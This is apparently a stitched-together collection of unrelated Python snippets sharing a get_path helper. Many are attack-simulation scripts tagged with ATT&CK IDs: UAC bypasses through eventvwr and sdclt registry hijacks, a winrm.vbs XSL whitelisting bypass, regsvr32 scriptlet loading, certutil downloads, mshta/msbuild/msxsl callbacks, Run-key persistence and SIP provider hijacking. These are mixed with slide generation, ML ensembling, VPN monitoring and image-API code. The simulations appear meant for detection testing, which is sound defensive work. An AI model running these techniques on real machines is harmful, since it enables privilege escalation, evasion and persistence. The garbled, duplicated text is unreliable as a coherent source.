def main(): common.log("winrm.vbs executing a backdoor") xslpath = common.get_path('bin','WsmPty.xsl') xslpath2 = common.get_path('bin','WsmTxt.xsl') targetdir = "%SystemDrive%\BypassDir\cscript.exe" cscriptName = "winword.exe" #"winword.exe" # "cscript.exe" common.execute(["cmd.exe","/C","mkdir","%s" % targetdir ]) common.execute(["cmd.exe","/C","copy", "%windir%\System32\cscript.exe","%s\%s" % (targetdir,cscriptName)]) common.execute(["cmd.exe","/C","copy", xslpath, targetdir]) common.execute(["cmd.exe","/C","copy", xslpath2, targetdir]) common.execute( 'cmd.exe /C %s\%s //nologo %%windir%%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty' % (targetdir,cscriptName)) common.execute( 'cmd.exe /C %s\%s //nologo %%windir%%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:"pretty"' % (targetdir,cscriptName)) common.execute( 'cmd.exe /C %s\%s //nologo %%windir%%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 /format:pretty' % (targetdir,cscriptName)) common.execute( 'cmd.exe /C %s\%s //nologo %%windir%%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 /format:"pretty"' % (targetdir,cscriptName)) common.execute( 'cmd.exe /C %s\%s //nologo %%windir%%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:text' % (targetdir,cscriptName)) common.execute( 'cmd.exe /C %s\%s //nologo %%windir%%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:"text"' % (targetdir,cscriptName)) common.execute( 'cmd.exe /C %s\%s //nologo %%windir%%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 /format:text' % (targetdir,cscriptName)) common.execute( 'cmd.exe /C %s\%s //nologo %%windir%%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 /format:"text"' % (targetdir,cscriptName)) time.sleep(10) common.log("Killing all calc to cleanup", "-") common.execute(["taskkill", "/f", "/im", "calculator.exe"]) common.log("Removing old files all calc to cleanup", "-") common.execute(["cmd.exe","/C","rd", "/s", "/q", targetdir])
def mouse_script_item( srcid, val, images_dct ): anim = val.split(":") a = anim[0] b = anim[1] if (b=="show"): nm = a info = images_dct.has_key(nm) fpath = os.path.join( info['path'], info['filename'] ) fpath = common.path_replace(fpath) fpath = common.get_path( fpath ) script = "document.getElementById('%s').style.visibility='visible';document.getElementById('%s').src='%s'" % (nm,nm,fpath) return script elif ( b=="hide"): nm = a script = "document.getElementById('%s').style.visibility='hidden';" % nm return script elif ( b=="replace" ): nm = a info = images_dct[nm][0] fpath = os.path.join( info['path'], info['filename'] ) fpath = common.path_replace( fpath ) script = "document.getElementById('%s').style.visibility='visible';document.getElementById('%s').src='%s'" % (srcid,srcid,fpath) return script else: print "WARNING: Nothing for mouse script item" return ""
def gen_charts(prs, num): for i in range(2, num + 2, 1): EMPTY_LAYOUT = prs.slide_layouts[EMPTY_LAYOUT_NUM] slide = prs.slides.add_slide(EMPTY_LAYOUT) title = slide.shapes.title title.text = "PCIE Test " + str(i - 1) slide.shapes.add_picture( get_path("\\outputs\\img\\" + str(i) + ".png"), Inches(2), Inches(2))
def run_ensamble(): ensemble_file = get_path( ) + 'data/submission/ensamble/mpnn_ensemble_all_good.csv' df_test = pd.read_csv(get_data_path() + 'test.csv') df_test = df_test.sort_values(by=['id']) test_id = df_test.id.values test_type = df_test.type.values num_test = len(test_id) coupling_count = np.zeros(num_test) coupling_value = np.zeros(num_test) # best local cv: # 0.000020 228.5* 85.7 | -1.130, -1.981, -1.651, -1.140, -2.251, -2.310, -2.133, -1.777 | -1.694 0.18 -1.80 | -2.058 | 3 hr 15 min # 0.00008 237.5* 47.5 | -1.178, -1.935, -1.590, +0.000, +0.000, +0.000, +0.000, +0.000 | -1.596 0.22 -1.57 | -1.559 | 0 hr 36 min subs = [ (['2JHC', '3JHC', '1JHN', '2JHN', '3JHN', '2JHH', '3JHH'], get_path() + 'data/submission/all_types/submit/sagpooling_larger_mpnn-175.csv'), (['1JHC', '2JHC', '3JHC'], get_path() + 'data/submission/all_JHC/submit/submit-00237500_model-larger.csv'), (['1JHC', '2JHC', '3JHC', '1JHN', '2JHN', '3JHN', '2JHH', '3JHH'], get_path() + 'data/submission/all_types_yukawa_radius_set2set/submit/set2set_highbs_mpnn_larger.csv' ) ] for valid_type, f in subs: df = pd.read_csv(f) df = df.sort_values(by=['id']) for t in valid_type: index = np.where(test_type == t)[0] coupling_value[index] += df.scalar_coupling_constant.values[index] coupling_count[index] += 1 coupling_value = coupling_value / coupling_count df = pd.DataFrame(list(zip(test_id, coupling_value)), columns=['id', 'scalar_coupling_constant']) df.to_csv(ensemble_file, index=False)
def analysis(directory: str = "./zip", aggregate=False, clusters_count=2, key_file="keys.csv", res_file="res.xlsx"): """ 对所有的 zip 文件进行分析,输出为到 res.xlsx 文件中""" if aggregate: aggregate_files(directory, key_file) file_path = get_path("keys.csv") groups = group(file_path, clusters_count=clusters_count) write_excel(groups, res_file) return True
def main(target_file=common.get_path("bin", "myapp.exe")): common.log("Bypass UAC with %s" % target_file) common.log("Writing registry key") hkey = winreg.CreateKey(winreg.HKEY_CURRENT_USER, "Software\\Classes\\MSCFile\\shell\\open\\command") winreg.SetValue(hkey, "", winreg.REG_SZ, target_file) common.log("Running event viewer") common.execute(["c:\\windows\\system32\\eventvwr.exe"]) common.log("Restoring registry key", log_type="-") winreg.DeleteValue(hkey, "") winreg.DeleteKey(hkey, "") winreg.CloseKey(hkey)
def main(): common.log("MsBuild Beacon") server, ip, port = common.serve_web() common.clear_web_cache() common.log("Updating the callback http://%s:%d" % (ip, port)) target_task = "tmp-file.csproj" common.copy_file(common.get_path("bin", "BadTasks.csproj"), target_task) new_callback = "http://%s:%d" % (ip, port) common.patch_regex(target_task, common.CALLBACK_REGEX, new_callback) common.execute([MS_BUILD, target_task]) common.remove_file(target_task) server.shutdown()
def gen_summary(prs, summary): EMPTY_LAYOUT = prs.slide_layouts[EMPTY_LAYOUT_NUM] slide = prs.slides.add_slide(EMPTY_LAYOUT) title = slide.shapes.title title.text = "PCIE Test Summary" x, y, cx, cy = Inches(4), Inches(1), Inches(2), Inches(1) shape = slide.shapes.add_table(2, 2, x, y, cx, cy) table = shape.table table.cell(0, 0).text = 'Pass' table.cell(0, 1).text = 'Fail' table.cell(1, 0).text = str(summary.pass_count) table.cell(1, 1).text = str(summary.fail_count) slide.shapes.add_picture(get_path("\\outputs\\img\\1.png"), Inches(2), Inches(3))
def main(target_program=common.get_path("bin", "myapp.exe")): common.log("Processes in Unusual Paths") if not common.check_dependencies(target_program): return common.MISSING_DEPENDENCIES # user tmp directories = ["C:\\Windows\\system32\\wbem"] for directory in directories: exists = os.path.exists(directory) if not exists: os.mkdir(directory) run_from_directory(target_program, directory) if not exists: os.rmdir(directory)
def main(): # make sure path is absolute for psexec status = common.run_system() if status is not None: return status common.log("Run a user-writeable file as system") source_path = common.get_path("bin", "myapp.exe") target_directory = "c:\\users\\fake_user_rta-%d" % os.getpid() if not os.path.exists(target_directory): os.makedirs(target_directory) target_path = os.path.join(target_directory, "user_file.exe") common.copy_file(source_path, target_path) common.execute(target_path) common.remove_directory(target_directory)
def main(target_process=common.get_path("bin", "myapp.exe")): target_process = os.path.abspath(target_process) common.log("Bypass UAC via Sdclt to run %s" % target_process) hkey = winreg.CreateKey( winreg.HKEY_CURRENT_USER, "Software\\Classes\\exefile\\shell\\runas\\command") key_name = "IsolatedCommand" common.log("Setting %s registry key" % key_name) winreg.SetValueEx(hkey, key_name, 0, winreg.REG_SZ, target_process) common.log("Running Sdclt to bypass UAC") common.execute([r"c:\windows\system32\sdclt.exe", "/KickOffElev"]) common.log("Clearing registry keys", log_type="-") winreg.DeleteValue(hkey, "IsolatedCommand") winreg.DeleteKey(hkey, "") winreg.CloseKey(hkey)
def analysis( directory: str = './zip', aggregate=False, clusters_count=2, file_count: int = 10, calc_times: bool = False, key_file='keys.csv', res_file='res.xlsx', ): """ 对所有的 zip 文件进行分析,输出为到 res.xlsx 文件中""" if aggregate: aggregate_files(directory, key_file) file_path = get_path('keys.csv') groups = group(file_path, clusters_count=clusters_count, calc_times=calc_times) if file_count > clusters_count: file_count = clusters_count each = clusters_count // file_count for i in range(file_count): subgroup = {t: groups.get(t) for t in range(i * each, (i + 1) * each)} write_excel(subgroup, f'res/{i + 1}_{res_file}') return True
def main(): status = common.run_system() if status is not None: return status common.log("System Restore Process Evasion") program_path = common.get_path("bin", "myapp.exe") common.log("Finding a writeable directory in %s" % SYSTEM_RESTORE) target_directory = common.find_writeable_directory(SYSTEM_RESTORE) if not target_directory: common.log("No writeable directories in System Restore. Exiting...", "-") return common.UNSUPPORTED_RTA target_path = os.path.join(target_directory, "restore-process.exe") common.copy_file(program_path, target_path) common.execute(target_path) common.log("Cleanup", log_type="-") common.remove_file(target_path)
def aggregation(path): path_files = common.get_path(path) print('Start filtering and aggregation:') for path in tqdm(path_files): df = pd.read_csv(path) filename = common.get_filename(path) logging.debug(f"File {filename} start fitering and aggreagation") df = filter_data(df) # Create date-hour colomn df['date_hour'] = [ datetime(item.year, item.month, item.day, item.hour) for item in df.tpep_pickup_datetime ] # Group by on date_hour and region data_group = df.groupby(['date_hour', 'region']).size().reset_index(name='count') data_group.to_csv('data_aggregation/' + filename + '.csv') logging.debug(f"File {filename} is ready \n")
# Name: Persistent Scripts # RTA: persistent_scripts.py # ATT&CK: T1064 (Scripting), T1086 (PowerShell) import common import os import time VBS = common.get_path("bin", "persistent_script.vbs") NAME = "rta-vbs-persistence" @common.dependencies(common.PS_EXEC, VBS) def main(): common.log("Persistent Scripts") if common.check_system(): common.log("Must be run as a non-SYSTEM user", log_type="!") return 1 # Remove any existing profiles user_profile = os.environ['USERPROFILE'] log_file = os.path.join(user_profile, NAME + ".log") # Remove log file if exists common.remove_file(log_file) common.log("Running VBS") common.execute(["cscript.exe", VBS]) # Let the script establish persistence, then read the log file back
# TODO: close this else: output = sys.stdout output.write("#pragma warning disable 0108\n"); # disable "'member1' hides inherited member 'member2'. Use the new keyword if hiding was intended." def get_classes(dn): classes = [] classes.extend(dn.root.children(child_type=uml.Class)) import collections q = collections.deque() q.extend(dn.root.children(child_type=uml.Namespace)) while q: namespace = q.pop() q.extend(namespace.children(child_type=uml.Namespace)) classes.extend(namespace.children(child_type=uml.Class)) return classes for child in get_classes(dn): searchList = {'c': child, 'namespace': common.interface_namespace + common.get_path(child.parent), 'uml': uml, 'diagram_name': dn.root.name} t = get_template("Interface", searchList=[searchList]) output.write(str(t)) searchList = {'c': child, 'namespace': common.impl_namespace + common.get_path(child.parent), 'uml': uml, 'diagram_name': dn.root.name, 'root': dn.root} t = get_template("Implementation", searchList=[searchList]) output.write(str(t)) searchList = {'root': dn.root} t = get_template("Initialize", searchList=[searchList]) output.write(str(t))
# Name: Microsoft HTA tool (mshta.exe) with Network Callback # RTA: mshta_network.py # ATT&CK: T1170 # Description: Generates network traffic from mshta.exe import common HTA_FILE = common.get_path("bin", "beacon.hta") @common.dependencies(HTA_FILE) def main(): # http server will terminate on main thread exit # if daemon is True common.log("MsHta Beacon") server, ip, port = common.serve_web() common.clear_web_cache() new_callback = "http://%s:%d" % (ip, port) common.log("Updating the callback to %s" % new_callback) common.patch_regex(HTA_FILE, common.CALLBACK_REGEX, new_callback) mshta = 'mshta.exe' common.execute([mshta, HTA_FILE], timeout=10, kill=True) server.shutdown() if __name__ == "__main__": exit(main())
# Name: Registry persistence creation # rta: registry_persistence_create.py # ATT&CK: T1015, T1103 # Description: Creates registry persistence for mock malware in Run and RunOnce keys, Services and debuggers. import winreg import time import common TARGET_APP = common.get_path("bin", "myapp.exe") def pause(): time.sleep(0.5) def write_reg_string(hive, key, value, data, delete=True): hkey = winreg.CreateKey(hive, key) key = key.rstrip('\\') common.log("Writing to registry %s\\%s -> %s" % (key, value, data)) winreg.SetValueEx(hkey, value, 0, winreg.REG_SZ, data) stored, code = winreg.QueryValueEx(hkey, value) if data != stored: common.log("Wrote %s but retrieved %s" % (data, stored), log_type="-") if delete: pause() common.log("Removing %s\\%s" % (key, value), log_type="-") winreg.DeleteValue(hkey, value) hkey.Close()
# Name: msxsl.exe Network # RTA: msxsl_network.py # ATT&CK: T1127 # Description: Generates network traffic from msxsl.exe import common MS_XSL = common.get_path("bin", "msxsl.exe") XML_FILE = common.get_path("bin", "customers.xml") XSL_FILE = common.get_path("bin", "cscript.xsl") @common.dependencies(MS_XSL, XML_FILE, XSL_FILE) def main(): common.log("MsXsl Beacon") server, ip, port = common.serve_web() common.clear_web_cache() new_callback = "http://%s:%d" % (ip, port) common.log("Updating the callback to %s" % new_callback) common.patch_regex(XSL_FILE, common.CALLBACK_REGEX, new_callback) common.execute([MS_XSL, XML_FILE, XSL_FILE]) server.shutdown() if __name__ == "__main__": exit(main())
import sys sys.path.append("..") import time import datetime from common import get_path, config, redis_utils, mysql_utils, sms_sender from logger import logger _logger = logger(get_path("logs//parser.log")) server_internal_failure_msg = u"%s:%s 已经下架 原因:服务器在线人数为0或访问不了youbube 时间:%s" ssh_connection_failure_msg = u"%s:%s 已经下架 原因:ssh连接失败或超时 时间:%s" class Runner: def __init__(self): self.redis_util = redis_utils() self.result = [] self.threshold = (config.getint("default", "period") * 60 * config.getfloat("default", "conn_failure_rate") / config.getint("default", "frequency")) self.fail_num = 0 self.initialize_data() _logger.logger.info(self.threshold) def cal_total_vpn_line(self): return int( mysql_utils(config["mysql"]["mysql_host"], _logger).get_all_server()[0][0])
# Name: Network Traffic from InstallUtil # RTA: installutil_network.py # ATT&CK: T1118 # Description: Uses mock .NET malware and InstallUtil to create network activity from InstallUtil. import common import sys import os MY_DOT_NET = common.get_path("bin", "mydotnet.exe") @common.dependencies(MY_DOT_NET) def main(): server, ip, port = common.serve_web() common.clear_web_cache() target_app = "mydotnet.exe" common.patch_file(MY_DOT_NET, common.wchar(":8000"), common.wchar(":%d" % port), target_file=target_app) install_util64 = "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe" install_util86 = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe" fallback = False if os.path.exists(install_util64): install_util = install_util64 elif os.path.exists(install_util86): install_util = install_util86
import win32com.client import sys from PIL import ImageGrab import os from common import get_path SRC_FILE = get_path("\\outputs\\Result.xlsx") IMAGE_PATH = get_path("\\outputs\\img\\") def store_excel_charts(summary): # os.mkdir(IMAGE_PATH) o = win32com.client.Dispatch("Excel.Application") o.Visible = 0 o.DisplayAlerts = 0 wb = o.Workbooks.Open(SRC_FILE) try: page_number = wb.Sheets.Count for i in range(1, page_number + 1): sheet = o.Sheets(i) for n, chart in enumerate(sheet.Shapes): chart.Copy() image = ImageGrab.grabclipboard() image.save(IMAGE_PATH + str(i) +'.png', 'png') pass pass except: print("Unexpected error:", sys.exc_info()[0]) print('** Error: Chart to Image Failed') wb.Close(True) o.Quit()
import sys sys.path.append("..") import time, datetime import threading import paramiko, socket from logger import logger from common import get_path, config, redis_utils _logger = logger( get_path("logs//runner_%s.log" % config["default"]["robot_order"])) class Task: def __init__(self): self.ssh_pass = config["vpn_server"]["ssh_pwd"] self.ssh_user = config["vpn_server"]["ssh_user"] self.ssh_port = config["vpn_server"]["ssh_port"] self.redis_util = redis_utils() self.result = {} def check(self, region, ip, status): try: ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect( ip, self.ssh_port, self.ssh_user, self.ssh_pass,
# Name: winrm.vbs Backdoor with .xsl Files # rta: squiblyfoo.py # ATT&CK: # Description: downloads a xsl file executing commands using the signed winrm.vbs script # References: https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404 import common import os import time @common.dependencies(common.get_path("bin", "WsmPty.xsl")) def main(): common.log("winrm.vbs executing a backdoor") xslpath = common.get_path('bin','WsmPty.xsl') xslpath2 = common.get_path('bin','WsmTxt.xsl') targetdir = "%SystemDrive%\BypassDir\cscript.exe" cscriptName = "winword.exe" #"winword.exe" # "cscript.exe" common.execute(["cmd.exe","/C","mkdir","%s" % targetdir ]) common.execute(["cmd.exe","/C","copy", "%windir%\System32\cscript.exe","%s\%s" % (targetdir,cscriptName)]) common.execute(["cmd.exe","/C","copy", xslpath, targetdir]) common.execute(["cmd.exe","/C","copy", xslpath2, targetdir]) common.execute( 'cmd.exe /C %s\%s //nologo %%windir%%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty' % (targetdir,cscriptName)) common.execute( 'cmd.exe /C %s\%s //nologo %%windir%%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:"pretty"' % (targetdir,cscriptName)) common.execute( 'cmd.exe /C %s\%s //nologo %%windir%%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 /format:pretty' % (targetdir,cscriptName)) common.execute( 'cmd.exe /C %s\%s //nologo %%windir%%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 /format:"pretty"' % (targetdir,cscriptName)) common.execute( 'cmd.exe /C %s\%s //nologo %%windir%%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:text' % (targetdir,cscriptName)) common.execute( 'cmd.exe /C %s\%s //nologo %%windir%%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:"text"' % (targetdir,cscriptName)) common.execute( 'cmd.exe /C %s\%s //nologo %%windir%%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 /format:text' % (targetdir,cscriptName))
import sys sys.path.append("..") import time, datetime from logger import logger from common import get_path, config, redis_utils, mysql_utils _logger = logger(get_path("logs//vpn_info.log")) class update_vpn_list: def __init__(self): self.redis_util = redis_utils() def update_vpn_info(self): result = mysql_utils(config["mysql"]["mysql_host"], _logger).get_server_info() robot_num = config.getint("default", "total_robot_num") if result: avg_ip_num = int(len(result) / robot_num) for _index in range(1, robot_num + 1): _start = avg_ip_num * (_index - 1) _end = avg_ip_num * _index if _index >= robot_num: self.redis_util.set_redis_key( "%s_%s" % (config["redis"]["prefix_vpn_key"], _index), result[_start:], )
# Name: RegSvr32 Backdoor with .sct Files # rta: regsvr32_scrobj.py # ATT&CK: T1121, T1117, T1064 # Description: Loads a .sct network callback with RegSvr32 import common @common.dependencies(common.get_path("bin", "notepad.sct")) def main(): common.log("RegSvr32 with .sct backdoor") server, ip, port = common.serve_web() common.clear_web_cache() uri = 'bin/notepad.sct' url = 'http://%s:%d/%s' % (ip, port, uri) common.execute( ["regsvr32.exe", "/u", "/n", "/s", "/i:%s" % url, "scrobj.dll"]) common.log("Killing all notepads to cleanup", "-") common.execute(["taskkill", "/f", "/im", "notepad.exe"]) server.shutdown() if __name__ == "__main__": exit(main())
import common input_file = "sample1.png" input_path = common.get_path(__file__, input_file) output_file = "output.jpg" output_path = common.get_path(__file__, output_file) format = "jpg" newWidth = 200 newHeight = 200 # invoke Aspose.Imaging Cloud SDK API to perform format change operation without using cloud storage response = common.imagingApi.PostChangeImageScale(format, newWidth, newHeight, file=input_path) if response.Status == 'OK': # download image from API response with open(output_path, 'wb') as f: for chunk in response.InputStream: f.write(chunk)
import common input_file = "sample1.png" input_path = common.get_path(__file__, input_file) output_file = "output.jpg" output_path = common.get_path(__file__, output_file) format = "jpg" # invoke Aspose.Imaging Cloud SDK API to perform format change operation without using cloud storage response = common.imagingApi.PostImageSaveAs(format, file=input_path) if response.Status == 'OK': # download image from API response with open(output_path, 'wb') as f: for chunk in response.InputStream: f.write(chunk)
# Name: RunDll32 with .inf Callback # rta: rundll32_inf_callback.py # ATT&CK: T1105 # Description: Loads RunDll32 with a suspicious .inf file that makes a local http GET import time import common INF_FILE = common.get_path("bin", "script_launch.inf") @common.dependencies(INF_FILE) def main(): # http server will terminate on main thread exit # if daemon is True common.log("RunDLL32 with Script Object and Network Callback") server, ip, port = common.serve_web() callback = "http://%s:%d" % (ip, port) common.clear_web_cache() common.patch_regex(INF_FILE, common.CALLBACK_REGEX, callback) rundll32 = "rundll32.exe" dll_entrypoint = "setupapi.dll,InstallHinfSection" common.execute( [rundll32, dll_entrypoint, "DefaultInstall", "128", INF_FILE], shell=False) time.sleep(1) common.log("Cleanup", log_type="-") common.execute("taskkill /f /im notepad.exe")
winreg.SetValueEx(hKey, "Dll", 0, winreg.REG_SZ, dll_path) common.log("Setting verify function name: %s" % verify_function) winreg.SetValueEx(hKey, "FuncName", 0, winreg.REG_SZ, verify_function) hKey = winreg.CreateKey(winreg.HKEY_LOCAL_MACHINE, GETSIG_KEY) common.log("Setting getsig dll path: %s" % dll_path) winreg.SetValueEx(hKey, "Dll", 0, winreg.REG_SZ, dll_path) common.log("Setting getsig function name: %s" % getsig_function) winreg.SetValueEx(hKey, "FuncName", 0, winreg.REG_SZ, getsig_function) if common.is_64bit(): SIGCHECK = common.get_path("bin", "sigcheck64.exe") TRUST_PROVIDER_DLL = common.get_path("bin", "TrustProvider64.dll") else: SIGCHECK = common.get_path("bin", "sigcheck.exe") TRUST_PROVIDER_DLL = common.get_path("bin", "TrustProvider32.dll") TARGET_APP = common.get_path("bin", "myapp.exe") @common.dependencies(SIGCHECK, TRUST_PROVIDER_DLL, TARGET_APP) def main(): common.log("Registering SIP provider") register_sip_provider(TRUST_PROVIDER_DLL, "VerifyFunction", "GetSignature") common.log("Launching sigcheck") common.execute([SIGCHECK, "-accepteula", TARGET_APP])
# it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. import os from common import get_path if os.path.exists(get_path("site-packages.zip")): DEBUG = True else: DEBUG = False TEMPLATE_DEBUG = DEBUG ADMINS = ( ('evilbeast', '*****@*****.**'), ) MANAGERS = ADMINS DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
# Name: Downloading Files With Certutil # RTA: certutil_webrequest.py # ATT&CK: T1105 # Description: Uses certutil.exe to download a file. import common MY_DLL = common.get_path("bin", "mydll.dll") @common.dependencies(MY_DLL) def main(): # http server will terminate on main thread exit # if daemon is True server, ip, port = common.serve_web() uri = "bin/mydll.dll" target_file = "mydll.dll" common.clear_web_cache() url = "http://{ip}:{port}/{uri}".format(ip=ip, port=port, uri=uri) common.execute( ["certutil.exe", "-urlcache", "-split", "-f", url, target_file]) server.shutdown() common.remove_file(target_file) if __name__ == "__main__": exit(main())
# Where the magic happens import common if __name__ == '__main__': # Grab the command line args and calculated verbosity (args, verbosity) = common.parse_args() # Set up the fancy logger, with optional file logging common.configure_logger(verbosity, args.logfile) # We're calling this a lot, so let's make it shorter logger = common.logger # And let's load the config file into common-space common.load_configuration(args.configfile) # For simplicity, shift to the repo root path = common.get_path() chdir(path) # Load checks and actions into the common-space # Sources are loaded by the checks themselves # Likewise, filters are loaded by actions common.get_thing('checks', common.checks) common.get_thing('actions', common.actions) while True: messages = [] now = common.now(update=True) for check in common.checks: if check.last_check + check.interval < now: for name, source in check.sources.items(): if source.last_check < now: